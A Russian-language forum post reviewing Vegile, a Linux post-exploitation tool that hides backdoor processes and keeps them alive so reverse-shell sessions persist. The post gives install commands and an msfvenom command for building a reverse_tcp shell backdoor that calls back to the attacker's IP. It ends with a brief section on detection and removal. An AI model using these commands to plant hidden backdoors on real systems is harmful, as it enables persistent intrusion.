• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Vegile Управление backdoor и rootkits

Vertigo

Lex mea est Vulgate Linux
Red Team
15.02.2017
789
2 079
#1
vertigo1.png

Добрый день,Уважаемые Друзья ,Форумчане и Гости,кому небезразличен пульс ИБ.

Сегодня буду вас немного огорчать своим обзором (а там не знаю,может кого и радовать)
Когда свои работы дарят миру такие авторы,то сомневаться в их компетенции не приходится.
Далёкий привет из Индонезии.

Встречаем ,очень хитрый и коварный инструмент - Vegile.
Автором его является,не нуждающийся в представлении-Redho Maland.
Да,тот самый,который входит в число 12-ти разработчиков дистрибутива для пентеста-Dracos Linux
Также ,многие его знают по авторству инструментов TheFatRat,LALIN,Brutal..

Vegile изначально задуман для атаки ОС Linux,закрепления в системе.
Это для файлов backdoor, с возможностью управления и постэксплуатации.
Целью его может стать любая платформа Linux (base32 , base64 - без разницы)
vertigo2.png

vertigo3.png

В основную задачу Vegile входит обеспечение поддержки уровня доступа к целевой системе.
В дальнейшем,это позволит работать на более глубокое вторжение в сеть.

Думал сделать этот обзор для Grey Section,но вспомнив,какая обширная аудитория у Codeby,
решил,что как можно больше Линуксоидов должны знать и принять меры безопасности при встрече с таким оружием.
Коварство Vegile выглядит по-своему шикарно :наведённый на попавший на целевую ОС backdoor или rootkit,
он как клещ цепляется и начинает скрывать процесс,ожидая когда атакующий вызовет shell.
vertigo5.png

При обнаружении (а это сделать не так-то просто),он показывает,что таких процессов нет.
Но при этом, далёко не всё в порядке с целевой ОС.При простой команде # ps -aux,
можно снова наблюдать его живее всех живых,а при попытке убить процесс,Vegile усыпляет бдительность,
хотя на самом деле,присваивает новый PID и тут же порождает кучу других процессов.
vertigo6.png

На атакующей машине можно не волноваться за потерю сессии,т.к. лёгким движением повтора команды exploit,
охотник может наблюдать сразу несколько сессий с доступами shell.
Как скачать:
Код:
# git clone https://github.com/Screetsec/Vegile.git
# cd Vegile
# chmod +x Vegile
# ./Vegile --help команда запуска с выводом справки.
Автор обзора и Администрация ресурса напоминают,что инструмет рассматривается исключительно
в рамках ознакомления и изучения проблем информационной безопасности.
Категорически запрещено использование инструмента в незаконных целях.


Опций,как можно видеть ,немного:
Указание файла ,с которым работать,с функцией возобновления
И использование опции,обеспечивающей скрытие процессов.

Код:
$ sudo ./Vegile --u файл_backdoor
$ sudo ./Vegile --i файл_backdoor
Сам вредоносный файл рекомендуется сгенерировать в msfvenome :
Код:
msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=свой IP LPORT=номер_порта -b "\x00" -f elf -o файл_BACKDOOR
Можно также воспользоваться TheFatRat ,или прибегнуть к другим способам.
Я использовал порт 8080 как и автор в своём примере.
Сессия прилетела сразу,как только включился в работу Vegile,хотя Metasploit не показал ,что exploit сработал сначала.

Как уберечь себя от такой атаки? Тяжело.При разнообразии backdoor,одному атакующему известно,какое название имеет процесс.
При включении в управление вредоносным файлом Vegile,процесс носит имя screetsec (по нику автора).
Но это если по дефолту.Убить процесс,как можно убедиться,мало,да это и не позволяет получить желаемый результат.
vertigo4.png

Содержать системы в чистоте,регулярно проверять на руткиты и вредоносы.Вот,при обнаружении таких процессов, мало удалить такие файлы. Мне удалось избавиться только при полном удалении и перезагрузке системы.
До этого,процессам всё же были присвоены PID,не смотря на ликвидацию.

А, на текущее время,у меня всё.Для вас мне помогли сделать этот обзор дистрибутивы Kali Linux и Bugtraq2 Black Widow (Чёрная Вдова).
Всем спасибо за внимание и до новых встреч на нашем Форуме.Видео от автора прилагаю.


 
Последнее редактирование:

Vertigo

Lex mea est Vulgate Linux
Red Team
15.02.2017
789
2 079
#3
хотя автор пишет Vegile is a tool for Post exploitation Techniquesin linux ,но не атаки.
за абзор спасибо!
Технически Вы правы.Постэксплуатация и точка. Меня побудила использовать такое выражение сама специфика усиливающего эффекта.
В том -то и дело,что замысел в развитии атаки.Vegile помогает закрепиться намертво backdoor в системе,помогает в маскировке,в обмане защитных систем ОС Linux. Он как бы продуман как вектор продолжения атаки.
 

kamaz

Well-known member
14.01.2018
101
17
#4
не в коем случае небхотел вас обидеть,классный обзор,крутой инструмент,спасибо за то,что сделали...
тут больше использование нашего великого,могучего ведь он многогранен и не побоюсь этого слова эластичен :cool:
 
Симпатии: Понравилось Vertigo

Vertigo

Lex mea est Vulgate Linux
Red Team
15.02.2017
789
2 079
#5
не в коем случае небхотел вас обидеть,классный обзор,крутой инструмент,спасибо за то,что сделали...
тут больше использование нашего великого,могучего ведь он многогранен и не побоюсь этого слова эластичен :cool:
Всё нормально,Бро,критика здоровая всегда уместна,ни о каких обидах не может быть и речи с моей стороны.
Хорошо,что внесли поправку,т.к. многие могли не воспринять сказанное.:)
 

kamaz

Well-known member
14.01.2018
101
17
#6
Всё нормально,Бро,критика здоровая всегда уместна,ни о каких обидах не может быть и речи с моей стороны.
Хорошо,что внесли поправку,т.к. многие могли не воспринять сказанное.:)
круто :)
 
Симпатии: Понравилось Vertigo
Вверх Снизу